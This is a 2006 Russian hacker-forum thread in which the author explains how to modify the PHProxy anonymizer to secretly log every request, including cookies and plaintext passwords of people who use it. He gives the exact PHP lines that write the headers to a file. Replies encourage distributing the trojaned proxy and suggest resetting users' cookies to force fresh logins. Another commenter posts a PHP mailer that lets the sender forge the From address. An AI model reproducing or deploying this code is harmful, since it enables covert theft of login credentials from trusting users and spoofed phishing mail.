Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   Анонимайзер =) (https://forum.antichat.xyz/showthread.php?t=26219)

bul.666 30.10.2006 17:38
Анонимайзер =)
 
Вообщем буду краток...
Воруем пароли с помощью анонимайзера

Недавно решил написать анонимайзер... Но так и не начал, так как появилась другая идея! Вести лог запросов с моего анонимайзера... Ведь там хрогиться много чего интересного, например Наши куки, да что куки там пароль в открытом виде! =)

Например: Мы зашли на форум античата через скирпт и сразу пошли авторизоваться... При авторизации отправляемый пакет выглядит следующим образом:
PHP код:
POST /login.php HTTP/1.0
Hostforum.antichat.ru:80
User-AgentMozilla/5.0 (WindowsUWindows NT 5.1rurv:1.8.1Gecko/20061010 Firefox/2.0
Refererhttp://forum.antichat.ru
Content-Typeapplication/x-www-form-urlencoded
Content-Length151

vb_login_username=[НАШ_ЛОГИН]&vb_login_password=[НАШ ПАРОЛЬ]&cookieuser=1&do=login&forceredirect=1&vb_login_md5password
Как видно наш пароль виден! (с)

Поэтому не решил заморачиваться писать его, а просто изменил уже готовый...

Я взял PHProxy 0.4 (Взять его можно тут )
Начал изучать его работу и искал место, где он отправляет пакеты на сервер... Это место я нашел! (Действительно, писал бы я ето, еслиб не нашел?...) =)
В файле PHProxy.class.php на линии 713.
PHP код:
 $this->request_headers $headers
Тут все данные собираются в одну переменну, т.е. в готовый пакет... Именно этот пакет то нам и нужен...
Осталось тока его сохранять в файл при каждой отправке... Делается это просто:
PHP код:
$this->request_headers $headers;
$txt fopen ("log.txt","a");    
fputs($txt,$headers."\r\n=================================\r\n");
fclose($txt); 
Теперь все пакеты будут отправляться на сервер и одновременно записоваться в лог...
Конечно txt файл не очень удобен, но им и не ограничевается! Можно создать базу данных, куда будут запихиваться пакеты... Для удобства можно, чтобы каждая таблица имела имя хоста а вней уже все пакеты с него... Вообщем простор есть =)

ЗЫ. Сразу скажу, что PHProxy использовал на апаче, причем удачно, на сайты не загружал =)
вы можете использовать любой другой анонимайзер =)
ЗЗЫ. Извиняюсь, если криво оформлено, или подобная статья уже есть... Или если это вообще бред... =)
Думаю и статьей это трудно назвать...

Интересно станите ли вы доверять им после прочтенного?
(с) bul666

Ch3ck 30.10.2006 17:42
Ну теперь начинай распространять обновлённый аномайзер!

bul.666 30.10.2006 17:45
Цитата:
Ну теперь начинай распространять обновлённый аномайзер!
Кстати... Сначала вообще решил написать Antichat's Анонимайзер и поместить в Избранное... =))))

Sn@k3 30.10.2006 17:51
эххххххх бульба) приболел? во лови и не парься)
mail.php
PHP код:
<?
print("<!-- coded Sn@k3 2006 Ma1l S3nd (c) -->
<meta Content-type: text/plain; charset=windows-1253>
<html>
<head><title>Ma1l S3nD 0.1</title><body background='1010.JPG'></head><hr width='80%' color='#555555'><center><h1>Ma1l S3nD 0.1</h1></center><hr width='80%' color='#555555' />
<form name='Send' method='post' action='mailer.php'>
<input type='text'name='poluchatel' value=''>:poluchatel@mail.ru<br>
<input type='text' name='otpravitel' value=''>:otpravitel@mail.ru or Anton <оtprаvitel@mail.ru><br>
<input type='text'  name='subj' value='Превед...'>

<input type='radio' checked='checked' tabindex='1' name='tipe' value='html'>:html <input type='radio' name='tipe' value='plain'>:text
<br>
<textarea name='messaga' rows='4' cols='110' value='Сообщение'></textarea><input type='submit' name='send' value='отправить'>
</form><hr width='100%' color='#f01f1f' /><center><a href='http://Snak3.microsoftt.ru' title='Перейти на главную страницу'>Snak3.microsoftt.ru 2006 (c)</a></center><hr width='100%' color='#f01f1f' />
</html>");
?>
PHP код:
<?
if($poluchatel)
{
if($otpravitel)
{
if($messaga)
{

$to  "$poluchatel", " ;
$subject "$subj";
$message $messaga;

$headers  "MIME-Version: 1.0
";
$headers .= "Content-type: text/$tipe; charset=iso-8859-1
";
$headers .= "From: $otpravitel
";
mail($to$subject$message$headers);
echo('<body background="1010.jpg"><center><b><font color="green">Сообщение успешно отправлено</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');

}
else 
{
echo('<body background="0101.jpg"><center><b><font color="red">Следует ввести текст сообщения!</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');
}
 
}
else 
{
echo('<body background="0101.jpg"><center><b><font color="red">Введите отправителя письма, то есть ваш e-mail.</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');
}

}
else
{
echo('<body background="0101.jpg"><center><b><font color="red">Необходимо ввести получателя данного письма.</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');
}
// Snak3.microsoftt.ru Sn@k3 ICQ 127924
?>

bul.666 30.10.2006 17:53
2Sn@k3: Ну дык это отправка почты =) Ты это предлогаешь поставить вместо сохранения в файл?

Qwazar 30.10.2006 18:10
Может тогда ещё юзеру будешь 1 раз куки сбрасывать? Чтобы 100% получать чистые пароли.

bul.666 30.10.2006 18:16
Цитата:
Чтобы 100% получать чистые пароли.
А так какой процент?

При заходе через анонимайзер на форум, даже если вы до этого были авторизированы там, все равно придется заново проходить авторизацию... =)

Sn@k3 30.10.2006 20:22
буль хз прочитал тока загаловок)


Время: 22:14